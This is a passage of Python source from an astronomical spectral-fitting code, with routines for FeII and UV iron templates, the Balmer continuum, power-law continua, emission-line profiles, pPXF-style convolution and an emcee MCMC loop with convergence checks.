[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
z_norm = np.array([np.max(z_conv_temp[:,i]) for i in range(np.shape(z_conv_temp)[1])])
z_norm[z_norm<1.e-6] = 1.0
z_conv_temp = z_conv_temp/z_norm
# Multiply by relative intensities
z_conv_temp = z_conv_temp * z_feii_rel_int
# Sum templates along rows
z_template = np.sum(z_conv_temp, axis=1)
# Multiply by FeII amplitude
z_template = z_template * z_feii_amp
z_template[(lam_gal < 4418) | (lam_gal > 5428)] = 0 # zero outside the template's wavelength coverage
return f_template,s_template,g_template,z_template
def calculate_k10_rel_int(transition,center,gf,e2,I2,temp):
"""
Calculate relative intensities for the S, F, and G FeII line groups
from the Kovacevic et al. (2010) template as a function of temperature.
"""
c = 2.99792458e+8 # speed of light; m/s
h = 6.62607004e-34 # Planck's constant; m2 kg s-1
k = 1.38064852e-23 # Boltzmann constant; m2 kg s-2 K-1
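# Relative intensities within each line group follow Kovacevic et al. (2010):
#   I/I_ref = (lam_ref/lam)^3 * (gf/gf_ref) * exp(-(E - E_ref)/(k*T)),
# scaled by the fitted amplitude (I2) of that group's reference line.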
if (transition=='F'):
# For the F transition, relative intensities are normalized to the 4549.474 A line
rel_int = I2*(4549.474/center)**3 * (gf/1.10e-02) * np.exp(-1.0/(k*temp) * (e2 - 8.896255e-19))
return rel_int
elif (transition=='S'):
# For the S transition, relative intensities are normalized to the 5018.440 A line
rel_int = I2*(5018.440/center)**3 * (gf/3.98e-02) * np.exp(-1.0/(k*temp) * (e2 - 8.589111e-19))
return rel_int
elif (transition=='G'):
# For the G transition, relative intensities are normalized to the 5316.615 A line
rel_int = I2*(5316.615/center)**3 * (gf/1.17e-02) * np.exp(-1.0/(k*temp) * (e2 - 8.786549e-19))
return rel_int
##################################################################################
##################################################################################
def VW01_uv_iron_template(lam_gal, pdict, uv_iron_template, uv_iron_options, velscale, run_dir):
"""
Generates the UV Iron model from Vestergaard & Wilkes (2001).
If the UV iron FWHM and/or VOFF are free to vary, perform the convolution of the UV iron template with a Gauss-Hermite kernel using the
pPXF framework.
"""
# Unpack uv_iron_template (uv_iron_fft, npad, vsyst)
uv_iron_fft, npad, vsyst = uv_iron_template
# Parse UV iron options
if (uv_iron_options['uv_amp_const']['bool']==False): # if amp not constant
uv_iron_amp = pdict['UV_IRON_AMP']
elif (uv_iron_options['uv_amp_const']['bool']==True): # if amp constant
uv_iron_amp = uv_iron_options['uv_amp_const']['uv_iron_val']
if (uv_iron_options['uv_fwhm_const']['bool']==False): # if fwhm not constant
uv_iron_fwhm = pdict['UV_IRON_FWHM']
elif (uv_iron_options['uv_fwhm_const']['bool']==True): # if fwhm constant
uv_iron_fwhm = uv_iron_options['uv_fwhm_const']['uv_iron_val']
if uv_iron_fwhm <= 0.01: uv_iron_fwhm = 0.01
if (uv_iron_options['uv_voff_const']['bool']==False): # if voff not constant
uv_iron_voff = pdict['UV_IRON_VOFF']
elif (uv_iron_options['uv_voff_const']['bool']==True): # if voff constant
uv_iron_voff = uv_iron_options['uv_voff_const']['uv_iron_val']
# Convolve the UV iron FFT template and return the inverse Fourier transform.
conv_temp = convolve_gauss_hermite(uv_iron_fft, npad, velscale,
[uv_iron_voff, uv_iron_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Reshape
conv_temp = conv_temp.reshape(-1)
# Re-normalize to 1
conv_temp = conv_temp/np.max(conv_temp)
# Multiply by amplitude
template = uv_iron_amp * conv_temp
# Reshape
# template = template.reshape(-1)
#
# Set fitting region outside of template to zero to prevent convolution loops
template[(lam_gal < 1074) | (lam_gal > 3090)] = 0
#
# If the summation results in 0.0, it means that features were too close
# to the edges of the fitting region (usually because the region is too
# small); in that case, simply return an array of zeros.
if (isinstance(template,int)) or (isinstance(template,float)):
template=np.zeros(len(lam_gal))
elif np.isnan(np.sum(template)):
template=np.zeros(len(lam_gal))
return template
##################################################################################
##################################################################################
def generate_balmer_continuum(lam_gal,lam_balmer, spec_high_balmer,velscale,
balmer_ratio, balmer_amp, balmer_fwhm, balmer_voff, balmer_Teff, balmer_tau):
# We need to generate a new grid for the Balmer continuum that matches
# the one we made for the higher-order lines
def blackbody(lam, balmer_Teff):
c = 2.99792458e+18 # speed of light [A/s]
h = 6.626196e-11 # Planck's constant [g*A2/s2 * s]
k = 1.380649 # Boltzmann Constant [g*A2/s2 1/K]
Blam = ((2.0*h*c**2.0)/lam**5.0)*(1.0/(np.exp((h*c)/(lam*k*balmer_Teff))-1.0))
return Blam
# Construct Balmer continuum from lam_balmer
lam_edge = 3646.0 # Balmer edge wavelength [A]
Blam = blackbody(lam_balmer, balmer_Teff) # blackbody function [erg/s]
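# Balmer continuum: blackbody B_lam(T_eff) attenuated by an optical depth that scales
# as balmer_tau*(lam/lam_edge)^3, normalized and truncated at the Balmer edge.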
cont = Blam * (1.0-1.0/np.exp(balmer_tau*(lam_balmer/lam_edge)**3.0))
# Normalize to the peak of the continuum
cont = cont / np.max(cont)
# Set Balmer continuum to zero after Balmer edge
cont[find_nearest(lam_balmer,lam_edge)[1]:] = 0.0
# Normalize higher-order lines at Balmer edge
# Unsure of how Calderone et al. (2017) (QSFit) did this normalization, so we added a
# fudge factor of 1.36 to match the QSFit implementation of the Balmer continuum.
# spec_high_balmer = spec_high_balmer/spec_high_balmer[find_nearest(lam_balmer,lam_edge+10)[1]] * balmer_ratio #* 1.36
if (np.sum(spec_high_balmer)>0):
spec_high_balmer = spec_high_balmer/np.max(spec_high_balmer) * balmer_ratio #* 1.36
# Sum the two components
full_balmer = spec_high_balmer + cont
# Pre-compute the FFT and vsyst
balmer_fft, balmer_npad = template_rfft(full_balmer)
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_balmer[0]/lam_gal[0])*c
if balmer_fwhm<= 0.01: balmer_fwhm = 0.01
# Broaden the higher-order Balmer lines
conv_temp = convolve_gauss_hermite(balmer_fft, balmer_npad, float(velscale),\
[balmer_voff, balmer_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
conv_temp = conv_temp/conv_temp[find_nearest(lam_gal,lam_edge)[1]] * balmer_ratio
conv_temp = conv_temp.reshape(-1)
# Normalize the full continuum to 1
# norm_balmer = conv_temp[find_nearest(lam_gal,3000.0)[1]]
# conv_temp = conv_temp/norm_balmer * balmer_amp
conv_temp = conv_temp/np.max(conv_temp) * balmer_amp
# Plot for testing purposes
if 0:
# Plot
fig = plt.figure(figsize=(14,5))
ax1 = fig.add_subplot(1,1,1)
ax1.set_title('Balmer Continuum')
# ax1.plot(lam_balmer, cont/np.max(cont), color='xkcd:cerulean')
# ax1.plot(lam_balmer, spec_high_balmer/np.max(spec_high_balmer), color='xkcd:bright red')
ax1.plot(lam_gal, conv_temp, color='xkcd:bright red',linewidth=0.75)
ax1.axvline(lam_edge,linestyle='--',color='xkcd:red',linewidth=1.0)
ax1.axvline(3000,linestyle='--',color='xkcd:black',linewidth=0.5)
ax1.axhline(1.0,linestyle='--',color='xkcd:black',linewidth=0.5)
# ax1.axhline(0.6,linestyle='--',color='xkcd:black',linewidth=0.5)
ax1.set_ylim(0.0,)
# ax1.set_xlim(1000,4500)
fontsize = 16
ax1.set_xlabel(r"Wavelength ($\lambda$)",fontsize=fontsize)
return conv_temp
##################################################################################
#### Simple Power-Law Template ###################################################
def simple_power_law(x,amp,alpha):
"""
Simple power-law function to model
the AGN continuum (Calderone et al. 2017).
Parameters
----------
x : array_like
wavelength vector (angstroms)
amp : float
continuum amplitude (flux density units)
alpha : float
power-law slope
Returns
----------
C : array
AGN continuum model the same length as x
"""
xb = np.max(x)-(0.5*(np.max(x)-np.min(x))) # normalization wavelength, taken to be the midpoint of the wavelength range
C = amp*(x/xb)**alpha # un-normalized
return C
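# Illustrative example (arbitrary values):
#   C = simple_power_law(np.array([4000., 5000., 6000.]), amp=1.0, alpha=-1.5)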
##################################################################################
#### Smoothly-Broken Power-Law Template ##########################################
def broken_power_law(x, amp, x_break, alpha_1, alpha_2, delta):
"""
Smoothly-broken power law continuum model; for use
when there is sufficient coverage in near-UV.
(See https://docs.astropy.org/en/stable/api/astropy.modeling.
powerlaws.SmoothlyBrokenPowerLaw1D.html#astropy.modeling.powerlaws.
SmoothlyBrokenPowerLaw1D)
Parameters
----------
x : array_like
wavelength vector (angstroms)
amp : float [0,max]
continuum amplitude (flux density units)
x_break : float [x_min,x_max]
wavelength of the break
alpha_1 : float [-4,2]
power-law slope on blue side.
alpha_2 : float [-4,2]
power-law slope on red side.
delta : float [0.001,1.0]
smoothness of the break; smaller values produce a sharper break
Returns
----------
C : array
AGN continuum model the same length as x
"""
C = amp * (x/x_break)**(alpha_1) * (0.5*(1.0+(x/x_break)**(1.0/delta)))**((alpha_2-alpha_1)*delta)
return C
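# Illustrative example (arbitrary values):
#   C = broken_power_law(np.array([2000., 4000., 6000.]), amp=1.0, x_break=4000.,
#                        alpha_1=-1.0, alpha_2=-2.0, delta=0.05)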
##################################################################################
##################################################################################
def gaussian_line_profile(lam_gal,center,amp,fwhm,voff,center_pix,fwhm_res_kms,velscale):
"""
Produces a gaussian vector the length of
x with the specified parameters.
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
sigma = fwhm/2.3548 # Gaussian dispersion in km/s
sigma_pix = sigma/(velscale) # dispersion in pixels (velscale = km/s/pixel)
if sigma_pix<=0.01: sigma_pix = 0.01
voff_pix = voff/(velscale) # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into a column vector
g = amp*np.exp(-0.5*(x_pix-(center_pix))**2/(sigma_pix)**2) # construct gaussian
g = np.sum(g,axis=1)
# Make sure the edges of the Gaussian are zero to avoid edge artifacts
g[(g>-1e-6) & (g<1e-6)] = 0.0
g[0] = g[1]
g[-1] = g[-2]
#
return g
##################################################################################
def lorentzian_line_profile(lam_gal,center,amp,fwhm,voff,center_pix,fwhm_res_kms,velscale,noise):
"""
Produces a lorentzian vector the length of
x with the specified parameters.
(See: https://docs.astropy.org/en/stable/api/astropy.modeling.functional_models.Lorentz1D.html)
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
fwhm_pix = fwhm/velscale # fwhm in pixels (velscale = km/s/pixel)
if fwhm_pix<=0.01: fwhm_pix = 0.01
voff_pix = voff/velscale # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into a column vector
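# gamma is the Lorentzian half-width at half-maximum (HWHM) in pixels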
gamma = 0.5*fwhm_pix
l = amp*( (gamma**2) / (gamma**2+(x_pix-center_pix)**2) ) # construct Lorentzian
l= np.sum(l,axis=1)
# Truncate wings below noise level
l[l<=np.median(noise)] = 0.0
l[l>np.median(noise)] -= np.median(noise)
# Make sure the edges of the Lorentzian are zero to avoid edge artifacts
l[(l>-1e-6) & (l<1e-6)] = 0.0
l[0] = l[1]
l[-1] = l[-2]
#
return l
##################################################################################
def gauss_hermite_line_profile(lam_gal,center,amp,fwhm,voff,hmoments,center_pix,fwhm_res_kms,velscale,noise):
"""
Produces a Gauss-Hermite vector the length of
x with the specified parameters.
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
sigma_pix = fwhm/2.3548/velscale # dispersion in pixels (velscale = km/s/pixel)
if sigma_pix<=0.01: sigma_pix = 0.01
voff_pix = voff/velscale # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into a column vector
# Taken from Riffel 2010 - profit: a new alternative for emission-line profile fitting
w = (x_pix-center_pix)/sigma_pix
alpha = 1.0/np.sqrt(2.0)*np.exp(-w**2/2.0)
if hmoments is not None:
mom = len(hmoments)+2
n = np.arange(3, mom + 1)
nrm = np.sqrt(special.factorial(n)*2**n) # Normalization
coeff = np.append([1, 0, 0],hmoments/nrm)
h = hermite.hermval(w,coeff)
g = (amp*alpha)/sigma_pix*h
elif hmoments is None:
coeff = np.array([1, 0, 0])
h = hermite.hermval(w,coeff)
g = (amp*alpha)/sigma_pix*h
g = np.sum(g,axis=1)
# We ensure any values of the line profile that are negative
# are zeroed out (See Van der Marel 1993)
g[g<0] = 0.0
# Normalize to 1
g = g/np.max(g)
# Apply amplitude
g = amp*g
# Truncate wings below noise level
g[g<=np.median(noise)] = 0.0
g[g>np.median(noise)] -= np.median(noise)
# Replace the ends with the same value
g[(g>-1e-6) & (g<1e-6)] = 0.0
g[0] = g[1]
g[-1] = g[-2]
#
return g
##################################################################################
def voigt_line_profile(lam_gal,center,amp,fwhm,voff,shape,center_pix,fwhm_res_kms,velscale,noise):
"""
Pseudo-Voigt profile implementation from:
https://docs.mantidproject.org/nightly/fitting/fitfunctions/PseudoVoigt.html
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
fwhm_pix = fwhm/velscale # fwhm in pixels (velscale = km/s/pixel)
if fwhm_pix<=0.01: fwhm_pix = 0.01
sigma_pix = fwhm_pix/2.3548
if sigma_pix<=0.01: sigma_pix = 0.01
voff_pix = voff/velscale # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into a column vector
# Gaussian contribution
a_G = 1.0/(sigma_pix * np.sqrt(2.0*np.pi))
g = a_G * np.exp(-0.5*(x_pix-(center_pix))**2/(sigma_pix)**2)
g = np.sum(g,axis=1)
# Lorentzian contribution
l = (1.0/np.pi) * (fwhm_pix/2.0)/((x_pix-center_pix)**2 + (fwhm_pix/2.0)**2)
l = np.sum(l,axis=1)
# Intensity
# I = amp/((float(shape)*a_G) + ((1.0-float(shape))*(2.0/(np.pi*fwhm_pix))))
# Voigt profile
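# 'shape' is the mixing fraction: shape=1 gives a pure Gaussian, shape=0 a pure Lorentzian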
pv = (float(shape) * g) + ((1.0-float(shape))*l)
# Normalize and multiply by amplitude
pv = pv/np.max(pv)*amp
# Truncate wings below noise level
pv[pv<=np.median(noise)] = 0.0
pv[pv>np.median(noise)] -= np.median(noise)
# Replace the ends with the same value
pv[(pv>-1e-6) & (pv<1e-6)] = 0.0
pv[0] = pv[1]
pv[-1] = pv[-2]
return pv
##################################################################################
# pPXF Routines (from Cappellari 2017)
# NAME:
# GAUSSIAN_FILTER1D
#
# MODIFICATION HISTORY:
# V1.0.0: Written as a replacement for the Scipy routine with the same name,
# to be used with variable sigma per pixel. MC, Oxford, 10 October 2015
def gaussian_filter1d(spec, sig):
"""
Convolve a spectrum by a Gaussian with different sigma for every pixel.
If all sigma are the same this routine produces the same output as
scipy.ndimage.gaussian_filter1d, except for the border treatment.
Here the first/last p pixels are filled with zeros.
When creating a template library for SDSS data, this implementation
is 60x faster than a naive for loop over pixels.
:param spec: vector with the spectrum to convolve
:param sig: vector of sigma values (in pixels) for every pixel
:return: spec convolved with a Gaussian with dispersion sig
"""
if isinstance(sig,(int,float)):
sig = np.full_like(spec,float(sig))
sig = sig.clip(0.01) # forces zero sigmas to have 0.01 pixels
p = int(np.ceil(np.max(3*sig)))
m = 2*p + 1 # kernel size
x2 = np.linspace(-p, p, m)**2
n = spec.size
a = np.zeros((m, n))
for j in range(m): # Loop over the small size of the kernel
a[j, p:-p] = spec[j:n-m+j+1]
gau = np.exp(-x2[:, None]/(2*sig**2))
gau /= np.sum(gau, 0)[None, :] # Normalize kernel
conv_spectrum = np.sum(a*gau, 0)
return conv_spectrum
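# Illustrative usage (a sketch; `spec` is a 1-D numpy array):
#   smoothed = gaussian_filter1d(spec, 1.5)           # constant sigma of 1.5 pixels
#   smoothed = gaussian_filter1d(spec, sig_per_pixel) # per-pixel sigmas, same length as spec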
##################################################################################
def log_rebin(lamRange, spec, oversample=1, velscale=None, flux=False):
"""
Logarithmically rebin a spectrum, while rigorously conserving the flux.
Basically the photons in the spectrum are simply redistributed according
to a new grid of pixels, with non-uniform size in the spectral direction.
When the flux keyword is set, this program performs an exact integration
of the original spectrum, assumed to be a step function within the
linearly-spaced pixels, onto the new logarithmically-spaced pixels.
The output was tested to agree with the analytic solution.
:param lamRange: two elements vector containing the central wavelength
of the first and last pixels in the spectrum, which is assumed
to have constant wavelength scale! E.g. from the values in the
standard FITS keywords: LAMRANGE = CRVAL1 + [0, CDELT1*(NAXIS1 - 1)].
It must be LAMRANGE[0] < LAMRANGE[1].
:param spec: input spectrum.
:param oversample: can be used to avoid losing spectral resolution,
especially for extended wavelength ranges, and to avoid aliasing.
Default: OVERSAMPLE=1 ==> Same number of output pixels as input.
:param velscale: velocity scale in km/s per pixels. If this variable is
not defined, then it will contain in output the velocity scale.
If this variable is defined by the user it will be used
to set the output number of pixels and wavelength scale.
:param flux: (boolean) True to preserve total flux. In this case the
log rebinning changes the pixel fluxes in proportion to their
dLam, so the following commands will show large differences
between the spectral shape before and after LOG_REBIN:
plt.plot(exp(logLam), specNew) # Plot log-rebinned spectrum
plt.plot(np.linspace(lamRange[0], lamRange[1], spec.size), spec)
By default, when this is False, the above two lines produce
two spectra that almost perfectly overlap each other.
:return: [specNew, logLam, velscale] where logLam is the natural
logarithm of the wavelength and velscale is in km/s.
"""
lamRange = np.asarray(lamRange)
assert len(lamRange) == 2, 'lamRange must contain two elements'
assert lamRange[0] < lamRange[1], 'It must be lamRange[0] < lamRange[1]'
assert spec.ndim == 1, 'input spectrum must be a vector'
n = spec.shape[0]
m = int(n*oversample)
dLam = np.diff(lamRange)/(n - 1.) # Assume constant dLam
lim = lamRange/dLam + [-0.5, 0.5] # All in units of dLam
borders = np.linspace(*lim, num=n+1) # Linearly
logLim = np.log(lim)
c = 299792.458 # Speed of light in km/s
if velscale is None: # Velocity scale not set by user; compute it
velscale = np.diff(logLim)/m*c # Only for output
else:
logScale = velscale/c
m = int(np.diff(logLim)/logScale) # Number of output pixels
logLim[1] = logLim[0] + m*logScale
newBorders = np.exp(np.linspace(*logLim, num=m+1)) # Logarithmically
k = (newBorders - lim[0]).clip(0, n-1).astype(int)
specNew = np.add.reduceat(spec, k)[:-1] # Do analytic integral
specNew *= np.diff(k) > 0 # fix for design flaw of reduceat()
specNew += np.diff((newBorders - borders[k])*spec[k])
if not flux:
specNew /= np.diff(newBorders)
# Output log(wavelength): log of geometric mean
logLam = np.log(np.sqrt(newBorders[1:]*newBorders[:-1])*dLam)
return specNew, logLam, velscale
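# Illustrative usage (a sketch; `lam` is a linearly-spaced wavelength grid and `spec` the flux):
#   specNew, logLam, velscale = log_rebin([lam[0], lam[-1]], spec)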
###############################################################################
def rebin(x, factor):
"""
Rebin a vector, or the first dimension of an array,
by averaging within groups of "factor" adjacent values.
"""
if factor == 1:
xx = x
else:
xx = x.reshape(len(x)//factor, factor, -1).mean(1).squeeze()
return xx
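# Worked example: rebin(np.arange(6.), 2) returns array([0.5, 2.5, 4.5])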
###############################################################################
def template_rfft(templates):
npix_temp = templates.shape[0]
templates = templates.reshape(npix_temp, -1)
npad = fftpack.next_fast_len(npix_temp)
templates_rfft = np.fft.rfft(templates, npad, axis=0)
return templates_rfft,npad
##################################################################################
def convolve_gauss_hermite(templates_rfft,npad, velscale, start, npix,
velscale_ratio=1, sigma_diff=0, vsyst=0):
"""
Convolve a spectrum, or a set of spectra, arranged into columns of an array,
with a LOSVD parametrized by the Gauss-Hermite series.
This is intended to reproduce what pPXF does for the convolution and it
uses the analytic Fourier Transform of the LOSVD introduced in
Cappellari (2017) http://adsabs.harvard.edu/abs/2017MNRAS.466..798C
EXAMPLE:
...
pp = ppxf(templates, galaxy, noise, velscale, start,
degree=4, mdegree=4, velscale_ratio=ratio, vsyst=dv)
spec = convolve_gauss_hermite(templates, velscale, pp.sol, galaxy.size,
velscale_ratio=ratio, vsyst=dv)
# The spectrum below is equal to pp.bestfit to machine precision
spectrum = (spec @ pp.weights)*pp.mpoly + pp.apoly
:param templates_rfft: FFT of the log-rebinned spectra (output of template_rfft)
:param npad: FFT padding length returned by template_rfft
:param velscale: velocity scale c*dLogLam in km/s
:param start: parameters of the LOSVD [vel, sig, h3, h4,...]
:param npix: number of output pixels
:return: vector or array with convolved spectra
"""
# npix_temp = templates.shape[0]
# templates = templates.reshape(npix_temp, -1)
start = np.array(start,dtype=float) # make copy
start[:2] /= velscale
vsyst /= velscale
# npad = fftpack.next_fast_len(npix_temp)
# templates_rfft = np.fft.rfft(templates, npad, axis=0)
lvd_rfft = losvd_rfft(start, 1, start.shape, templates_rfft.shape[0],
1, vsyst, velscale_ratio, sigma_diff)
conv_temp = np.fft.irfft(templates_rfft*lvd_rfft[:, 0], npad, axis=0)
conv_temp = rebin(conv_temp[:npix*velscale_ratio, :], velscale_ratio)
return conv_temp
##################################################################################
def losvd_rfft(pars, nspec, moments, nl, ncomp, vsyst, factor, sigma_diff):
"""
Analytic Fourier Transform (of real input) of the Gauss-Hermite LOSVD.
Equation (38) of Cappellari M., 2017, MNRAS, 466, 798
http://adsabs.harvard.edu/abs/2017MNRAS.466..798C
"""
losvd_rfft = np.empty((nl, ncomp, nspec), dtype=complex)
p = 0
for j, mom in enumerate(moments): # loop over kinematic components
for k in range(nspec): # nspec=2 for two-sided fitting, otherwise nspec=1
s = 1 if k == 0 else -1 # s=+1 for left spectrum, s=-1 for right one
vel, sig = vsyst + s*pars[0 + p], pars[1 + p]
a, b = [vel, sigma_diff]/sig
w = np.linspace(0, np.pi*factor*sig, nl)
losvd_rfft[:, j, k] = np.exp(1j*a*w - 0.5*(1 + b**2)*w**2)
if mom > 2:
n = np.arange(3, mom + 1)
nrm = np.sqrt(special.factorial(n)*2**n) # Normalization
coeff = np.append([1, 0, 0], (s*1j)**n * pars[p - 1 + n]/nrm)
poly = hermite.hermval(w, coeff)
losvd_rfft[:, j, k] *= poly
p += mom
return np.conj(losvd_rfft)
##################################################################################
def nnls(A,b,npoly=0):
"""
Non-negative least squares.
A Nobel Prize shall be awarded to whoever makes this
way faster, because it is the choke point of the entire code.
"""
m, n = A.shape
AA = np.hstack([A, -A[:, :npoly]])
x = optimize.nnls(AA, b)[0]
x[:npoly] -= x[n:]
return np.array(x[:n])
####################################################################################
def run_emcee(pos,ndim,nwalkers,run_dir,lnprob_args,init_params,param_names,
auto_stop,conv_type,min_samp,ncor_times,autocorr_tol,write_iter,write_thresh,burn_in,min_iter,max_iter,
verbose=True):
"""
Runs MCMC using emcee on all final parameters and checks for autocorrelation convergence
every write_iter iterations.
"""
# Keep original burn_in and max_iter to reset convergence if jumps out of convergence
orig_burn_in = burn_in
orig_max_iter = max_iter
# Sorted parameter names
param_names = np.array(param_names)
i_sort = np.argsort(param_names) # this array gives the ordered indices of parameter names (alphabetical)
# Create MCMC_chain.csv if it doesn't exist
chain_file = run_dir.joinpath('log', 'MCMC_chain.csv')
if not chain_file.exists():
with chain_file.open(mode='w') as f:
param_string = ', '.join(str(e) for e in param_names)
f.write('# iter, ' + param_string) # Write initial parameters
best_str = ', '.join(str(e) for e in init_params)
f.write('\n 0, '+best_str)
# initialize the sampler
dtype = [('fluxes',dict),('eqwidths',dict),('cont_fluxes',dict),("int_vel_disp",dict),('log_like',float)] # mcmc blobs
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=lnprob_args,blobs_dtype=dtype) # blobs_dtype=dtype added for Python2 -> Python3
start_time = time.time() # start timer
write_log((ndim,nwalkers,auto_stop,conv_type,burn_in,write_iter,write_thresh,min_iter,max_iter),'emcee_options',run_dir)
# Initialize stuff for autocorrelation analysis
if (auto_stop==True):
autocorr_times_all = [] # storage array for autocorrelation times
autocorr_tols_all = [] # storage array for autocorrelation tolerances
old_tau = np.full(len(param_names),np.inf)
min_samp = min_samp # minimum iterations to use past convergence
ncor_times = ncor_times # multiplicative tolerance; number of correlation times before which we stop sampling
autocorr_tol = autocorr_tol
stop_iter = max_iter # stopping iteration; changes once convergence is reached
converged = False
# write_log((min_samp,autocorr_tol,ncor_times,conv_type),'autocorr_options',run_dir)
# If one provides a list of parameters for autocorrelation, it needs to be in the
# form of a tuple. If one only provides one parameter, it needs to be converted to a tuple:
if (auto_stop==True) and (conv_type != 'all') and (conv_type != 'mean') and (conv_type != 'median'):
if not isinstance(conv_type, tuple):
conv_type = (conv_type,) #
# Check auto_stop convergence type:
if (auto_stop==True) and (isinstance(conv_type,tuple)==True) :
if all(elem in param_names for elem in conv_type)==True:
if (verbose):
print('\n Only considering convergence of following parameters: ')
for c in conv_type:
print(' %s' % c)
pass
# check that every parameter in conv_type is a valid parameter name; if not,
# remove the invalid entries from conv_type
else:
try:
conv_type_list = list(conv_type)
for c in conv_type:
if c not in param_names:
conv_type_list.remove(c)
conv_type = tuple(conv_type_list)
if (all(elem in param_names for elem in conv_type)==True) and (len(conv_type)>0):
if (verbose):
print('\n Only considering convergence of following parameters: ')
for c in conv_type:
print(' %s' % c)
pass
else:
if (verbose):
print('\n One or more parameters in conv_type is not a valid parameter. Defaulting to median convergence type...\n')
conv_type='median'
except:
print('\n One or more parameters in conv_type is not a valid parameter. Defaulting to median convergence type...\n')
conv_type='median'
if (auto_stop==True):
write_log((min_samp,autocorr_tol,ncor_times,conv_type),'autocorr_options',run_dir)
# Run emcee
for k, result in enumerate(sampler.sample(pos, iterations=max_iter)):
if ((k+1) % write_iter == 0) and verbose:
print("MCMC iteration: %d" % (k+1))
best = [] # For storing current chain positions (median of parameter values at write_iter iterations)
if ((k+1) % write_iter == 0) and ((k+1)>=write_thresh): # Write every [write_iter] iteration
# Chain location for each parameter
# Median of last 100 positions for each walker.
nwalkers = np.shape(sampler.chain)[0]
npar = np.shape(sampler.chain)[2]
sampler_chain = sampler.chain[:,:k+1,:]
new_sampler_chain = []
for i in range(0,np.shape(sampler_chain)[2],1):
pflat = sampler_chain[:,:,i] # flattened along parameter
flat = np.concatenate(np.stack(pflat,axis=1),axis=0)
new_sampler_chain.append(flat)
# best = []
for pp in range(0,npar,1):
data = new_sampler_chain[pp][-int(nwalkers*write_iter):]
med = np.median(data)
best.append(med)
# write to file
with run_dir.joinpath('log', 'MCMC_chain.csv').open(mode='a') as f:
best_str = ', '.join(str(e) for e in best)
f.write('\n'+str(k+1)+', '+best_str)
# Checking autocorrelation times for convergence
if ((k+1) % write_iter == 0) and ((k+1)>=min_iter) and ((k+1)>=write_thresh) and (auto_stop==True):
# Autocorrelation analysis of chain to determine convergence; the minimum autocorrelation time is 1.0, which results when a time cannot be accurately calculated.
tau = autocorr_convergence(sampler.chain,param_names,plot=False) # Calculate autocorrelation times for each parameter
autocorr_times_all.append(tau) # append tau to storage array
# Calculate tolerances
tol = (np.abs(tau-old_tau)/old_tau) * 100.0
autocorr_tols_all.append(tol) # append tol to storage array
# If convergence for mean autocorrelation time
if (auto_stop==True) & (conv_type == 'mean'):
par_conv = [] # converged parameter indices
par_not_conv = [] # non-converged parameter indices
for x in range(0,len(param_names),1):
if (round(tau[x],1)>1.0):# & (0.0<round(tol[x],1)<autocorr_tol):
par_conv.append(x) # Append index of parameter for which an autocorrelation time can be calculated; we use these to calculate the mean
else: par_not_conv.append(x)
# Calculate mean of parameters for which an autocorrelation time could be calculated
par_conv = np.array(par_conv) # Explicitly convert to array
par_not_conv = np.array(par_not_conv) # Explicitly convert to array
if (par_conv.size == 0) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif ( (par_conv.size > 0) and (k+1)>(np.mean(tau[par_conv]) * ncor_times) and (np.mean(tol[par_conv])<autocorr_tol) and (stop_iter == max_iter) ):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. | ' % (k+1))
print(' | Performing %d iterations of sampling... | ' % min_samp )
print(' | Sampling will finish at %d iterations. | ' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif ((par_conv.size == 0) or ( (k+1)<(np.mean(tau[par_conv]) * ncor_times)) or (np.mean(tol[par_conv])>autocorr_tol)) and (stop_iter < orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if (par_conv.size>0):
pnames_sorted = param_names[i_sort]
tau_sorted = tau[i_sort]
tol_sorted = tol[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}{1:<40}{2:<30}'.format('\nIteration = %d' % (k+1),'%d x Mean Autocorr. Time = %0.2f' % (ncor_times,np.mean(tau[par_conv]) * ncor_times),'Mean Tolerance = %0.2f' % np.mean(tol[par_conv])))
print('--------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<20}{4:<20}'.format('Parameter','Current Value','Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0) ):
conv_bool = 'True'
else: conv_bool = 'False'
